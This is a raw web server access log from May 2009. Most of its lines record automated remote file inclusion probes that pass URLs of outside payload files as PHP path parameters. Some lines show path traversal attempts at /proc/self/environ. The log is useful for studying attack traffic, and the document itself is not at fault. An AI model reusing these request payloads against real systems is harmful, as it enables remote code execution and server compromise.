217.160.4.250 - - [13/May/2009:01:02:33 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:01:02:33 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:01:02:34 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:01:02:37 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:01:02:37 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
88.191.48.81 - - [13/May/2009:01:02:43 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:01:02:43 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:01:02:43 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.172.126.16 - - [13/May/2009:01:02:57 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
69.172.126.16 - - [13/May/2009:01:03:01 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
217.160.4.250 - - [13/May/2009:01:03:21 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:01:03:21 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
220.79.47.122 - - [13/May/2009:01:04:21 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dajeon.es.kr/data/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
220.79.47.122 - - [13/May/2009:01:04:21 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dajeon.es.kr/data/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
220.79.47.122 - - [13/May/2009:01:04:21 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dajeon.es.kr/data/uiu.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
220.79.47.122 - - [13/May/2009:01:04:36 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dajeon.es.kr/data/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:01:04:36 -0500] "GET /logs/access_log.1203552000 HTTP/1.1" 200 19280 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.143 - - [13/May/2009:01:06:51 -0500] "GET /logs/access_log.1168732800 HTTP/1.1" 200 330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
199.120.90.222 - - [13/May/2009:01:08:18 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
199.120.90.222 - - [13/May/2009:01:08:18 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
67.227.156.113 - - [13/May/2009:01:09:01 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:01:09:01 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:01:09:01 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:01:09:50 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
66.249.67.180 - - [13/May/2009:01:09:52 -0500] "GET /logs/access_log.1106092800 HTTP/1.1" 200 8416 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.201.208.50 - - [13/May/2009:01:10:59 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
84.201.208.50 - - [13/May/2009:01:10:59 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
84.201.208.50 - - [13/May/2009:01:10:59 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.63.136 - - [13/May/2009:01:12:01 -0500] "GET /logs/access_log.1238112000//trgnews/install/article.php?dir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.227.63.136 - - [13/May/2009:01:12:01 -0500] "GET //trgnews/install/article.php?dir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.227.63.136 - - [13/May/2009:01:12:01 -0500] "GET /logs//trgnews/install/article.php?dir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.3.226.56 - - [13/May/2009:01:12:41 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.loanpricing.com/scripts/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.3.226.56 - - [13/May/2009:01:12:41 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.loanpricing.com/scripts/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.3.226.56 - - [13/May/2009:01:12:41 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.loanpricing.com/scripts/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:01:15:10 -0500] "GET /logs/access_log.1179705600 HTTP/1.1" 200 4781 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:01:20:28 -0500] "GET /logs/access_log.1148774400 HTTP/1.1" 200 2353 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.143 - - [13/May/2009:01:20:52 -0500] "GET /logs/access_log.1233446400 HTTP/1.1" 200 122732 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.106.113 - - [13/May/2009:01:21:09 -0500] "GET /logs/access_log.1182384000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.79.47.122 - - [13/May/2009:01:22:10 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dajeon.es.kr/data/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
220.79.47.122 - - [13/May/2009:01:22:10 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dajeon.es.kr/data/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
220.79.47.122 - - [13/May/2009:01:22:10 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dajeon.es.kr/data/uiu.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
220.79.47.122 - - [13/May/2009:01:22:25 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dajeon.es.kr/data/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
117.110.58.66 - - [13/May/2009:01:22:32 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://auralmoon.com/oldJoomlashell/mambots/system/idomila.txt? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.58.66 - - [13/May/2009:01:22:34 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://auralmoon.com/oldJoomlashell/mambots/system/idomila.txt? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.58.66 - - [13/May/2009:01:22:34 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://auralmoon.com/oldJoomlashell/mambots/system/idomila.txt? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.58.66 - - [13/May/2009:01:22:35 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://auralmoon.com/oldJoomlashell/mambots/system/idomila.txt? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.58.66 - - [13/May/2009:01:23:07 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://auralmoon.com/oldJoomlashell/mambots/system/idomila.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
117.110.58.66 - - [13/May/2009:01:23:11 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://auralmoon.com/oldJoomlashell/mambots/system/idomila.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.246.55.235 - - [13/May/2009:01:25:38 -0500] "GET /logs/access_log.1238457600//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.246.55.235 - - [13/May/2009:01:25:38 -0500] "GET //skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.246.55.235 - - [13/May/2009:01:25:39 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.246.55.235 - - [13/May/2009:01:25:39 -0500] "GET /logs/access_log.1238803200//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:01:25:45 -0500] "GET /logs/access_log.1139356800 HTTP/1.1" 200 260 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.227.193.198 - - [13/May/2009:01:25:58 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
58.227.193.198 - - [13/May/2009:01:25:58 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
58.227.193.198 - - [13/May/2009:01:25:58 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
58.227.193.198 - - [13/May/2009:01:25:58 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
193.221.119.126 - - [13/May/2009:01:26:39 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
193.221.119.126 - - [13/May/2009:01:26:39 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
193.221.119.126 - - [13/May/2009:01:26:39 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
193.221.119.126 - - [13/May/2009:01:26:41 -0500] "GET /logs/access_log.1233705600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:01:31:02 -0500] "GET /logs/access_log.1205452800 HTTP/1.1" 200 878 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:01:36:21 -0500] "GET /logs/access_log.1133136000 HTTP/1.1" 200 3913 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.103.144 - - [13/May/2009:01:36:23 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.103.144 - - [13/May/2009:01:36:23 -0500] "GET /logs/access_log.1240099200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.103.144 - - [13/May/2009:01:36:23 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [13/May/2009:01:36:23 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.115.89.68 - - [13/May/2009:01:40:12 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.115.89.68 - - [13/May/2009:01:40:12 -0500] "GET /logs/access_log.1239062400//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
211.115.89.68 - - [13/May/2009:01:40:17 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.232.143.209 - - [13/May/2009:01:40:27 -0500] "GET /?DOCUMENT_ROOT=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 200 3245 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
66.232.143.209 - - [13/May/2009:01:40:27 -0500] "GET /errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
66.232.143.209 - - [13/May/2009:01:40:28 -0500] "GET /?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
66.232.143.209 - - [13/May/2009:01:40:28 -0500] "GET /?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
66.232.143.209 - - [13/May/2009:01:40:34 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 200 189190 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
66.232.143.209 - - [13/May/2009:01:40:35 -0500] "GET /logs/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
66.232.143.209 - - [13/May/2009:01:40:37 -0500] "GET /logs/?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 189190 "-""XXXXXX"
66.232.143.209 - - [13/May/2009:01:40:39 -0500] "GET /logs/?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189190 "-""XXXXXX"
211.115.89.68 - - [13/May/2009:01:40:42 -0500] "GET /logs/access_log.1240099200//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
211.115.89.68 - - [13/May/2009:01:40:42 -0500] "GET /logs/access_log.1240531200//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
80.67.26.198 - - [13/May/2009:01:41:33 -0500] "GET /logs/access_log.1240099200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.67.26.198 - - [13/May/2009:01:41:33 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.67.26.198 - - [13/May/2009:01:41:33 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.67.26.198 - - [13/May/2009:01:41:33 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:01:41:37 -0500] "GET /logs/access_log.1120262400 HTTP/1.1" 200 2827 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.93.90.162 - - [13/May/2009:01:42:43 -0500] "GET /logs/access_log.1240099200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.93.90.162 - - [13/May/2009:01:42:43 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.93.90.162 - - [13/May/2009:01:42:43 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.93.90.162 - - [13/May/2009:01:42:43 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
193.221.119.126 - - [13/May/2009:01:45:16 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
69.94.30.156 - - [13/May/2009:01:46:38 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
69.94.30.156 - - [13/May/2009:01:46:38 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:01:46:54 -0500] "GET /logs/access_log.1149120000 HTTP/1.1" 200 919 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.22.204.90 - - [13/May/2009:01:47:15 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.76"
203.22.204.90 - - [13/May/2009:01:47:16 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.76"
202.89.33.167 - - [13/May/2009:01:47:35 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:01:47:35 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:01:47:36 -0500] "GET /logs/access_log.1239494400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:01:47:45 -0500] "GET /logs/access_log.1239148800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
221.139.1.251 - - [13/May/2009:01:48:06 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.139.1.251 - - [13/May/2009:01:48:06 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
221.139.1.251 - - [13/May/2009:01:48:06 -0500] "GET /logs/access_log.1240099200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
221.139.1.251 - - [13/May/2009:01:48:06 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.214.83.196 - - [13/May/2009:01:48:49 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:01:48:49 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.69"
85.92.68.111 - - [13/May/2009:01:48:50 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.92.68.111 - - [13/May/2009:01:48:50 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.92.68.111 - - [13/May/2009:01:48:50 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.92.68.111 - - [13/May/2009:01:48:50 -0500] "GET /logs/access_log.1240099200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
195.239.112.19 - - [13/May/2009:01:51:10 -0500] "GET /logs/access_log.1238716800///include/scripts/export_batch.inc.php?DIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
195.239.112.19 - - [13/May/2009:01:51:13 -0500] "GET /logs///include/scripts/export_batch.inc.php?DIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.239.112.19 - - [13/May/2009:01:51:14 -0500] "GET /logs/access_log.1234396800///include/scripts/export_batch.inc.php?DIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
